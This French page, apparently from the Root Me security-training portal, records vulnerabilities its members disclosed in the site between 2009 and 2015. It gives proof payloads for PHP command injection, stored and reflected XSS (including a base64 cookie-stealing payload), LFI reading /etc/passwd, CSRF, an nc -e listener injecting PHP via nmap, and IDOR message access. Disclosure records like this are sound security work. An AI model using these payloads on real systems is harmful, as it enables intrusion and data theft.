Faiblesses découvertes

Comme n’importe quel système d’informations ce portail comporte des vulnérabilités...

- [02/12/2009] real a identifié une injection de PHP sur la page poster.html. Cela permettait entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le service HTTP :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'

- [02/02/2011] hello a identifié plusieurs vulnérabilités de type stored XSS, notamment dans le corps d’un message privé et sur les champs "login" et "nom" du formulaire d’inscription :

<script>[code javascript/vbscript]</script>

- [15/02/2011] essandre a identifié une vulnérabilité de type inclusion de fichiers locaux (LFI) permettant de lire le contenu de n’importe quel fichier accessible en lecture au serveur web :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

- [30/06/2011] elyfean a identifié une vulnérabilité de type CSRF sur la chatbox. Cela permettait entre autre de faire poster n’importe quoi à une personne authentifiée sur le portail visitant une page piégée avec ce code :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

- [18/07/2011] g0uZ a identifié une vulnérabilité de type injection de code PHP sur la page "outils en ligne : nmap", permettant entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le service HTTP.

hôte a scanner en mode -sV :

--version-trace -p8888 [IP serveur maîtrisé]

Service en écoute sur le serveur maîtrisé :

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

- [02/10/2011] Hypnoze57 a identifié une vulnérabilité de type "référence indirecte à un objet non sécurisée" permettant de lire les messages privés de tous les membres :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_a_lire]

- [23/10/2011] courte66 a identifié une vulnérabilité de type reflected XSS sur la page "coder - décoder" :

Texte à décoder en base64 :

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

- [20/03/2012] jimee a identifié une vulnérabilité de type inclusion de fichiers arbitraire (LFI) dans le challenge réaliste 9 lui permettant entre autre de lire les fichiers d’autre challenges :

http://www.root-me.org/challenge/realiste/ch9/page_..%252f..%252f..%252fch1%252fmesfonction.php

- [06/11/2012] crown a identifié plusieurs vulnérabilités de type stored XSS, notamment sur les champs "nom_site" et "url_site" mais également sur le champs "nom" utilisé pendant l’inscription :

<script>[code javascript/vbscript]</script>

- [15/06/2013] LouTerrailloune a identifié une vulnérabilité de type injection de code PHP sur la page "coder - décoder" :

Texte à décoder en base64 :

PD9waHAgcGhwaW5mbygpOyA/Pg==

- [03/2015] WtF a identifié une vulnérabilité de type inclusion de fichiers arbitraire (LFI) dans le challenge web-serveur Path Truncation lui permettant entre autre de lire les fichiers d’autre challenges.

- [03/2015] WtF a identifié une vulnérabilité de type remote code execution (RCE) dans un challenge en cours d’évalution sur le serveur de production lui permettant entre autre d’accéder au système de fichier avec ssh et d’éxécuter des commandes.

- [12/10/2015] Michael_gottburg a identifié une vulnérabilité de type "référence indirecte à un objet non sécurisée" permettant de lire n’importe quel message privé :

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[ID_du_message]